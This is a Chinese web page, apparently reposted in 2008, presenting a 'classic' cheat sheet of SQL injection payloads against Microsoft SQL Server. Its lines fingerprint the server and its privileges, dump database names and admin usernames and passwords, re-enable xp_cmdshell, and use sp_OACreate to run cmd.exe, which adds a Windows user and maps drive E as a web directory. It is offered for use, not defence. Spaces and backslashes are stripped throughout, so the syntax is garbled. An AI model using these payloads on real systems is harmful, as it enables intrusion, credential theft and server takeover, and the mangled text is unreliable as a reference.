非常经典的Ms Sql注射资料
2008-10-04 11:10:32 来源:WEB开发网'unionselect@@version,1,1,1--
创建一个虚拟目录E盘:
and1=(select@@VERSION)
and'sa'=(selectSystem_user)
'unionselectret,1,1,1fromfoo--
'unionselectmin(username),1,1,1fromuserswhereusername>'a'-
'unionselectmin(username),1,1,1fromuserswhereusername>'admin'-
'unionselectpassword,1,1,1fromuserswhereusername='admin'--
anduser_name()='dbo'
and0<>(selectuser_name()-
;DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:WINNTsystem32cmd.exe/cnetuserswap5245886/add'
and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
;EXECmaster.dbo.sp_addextendedproc'xp_cmdshell','xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and1=(selectIS_SRVROLEMEMBER('sysadmin'))判断是否具有sa权限
and0<>(selecttop1pathsfromnewtable)--暴库大法
and1=(selectnamefrommaster.dbo.sysdatabaseswheredbid=7)得到库名(从1到5都是系统的id,6以上才可以判断)
declare@ointexecsp_oacreate'wscript.shell',@ooutexecsp_oamethod@o,'run',NULL,'cscript.exec:inetpubwwwrootmkwebdir.vbs-w"默认Web站点"-v"e","e:"'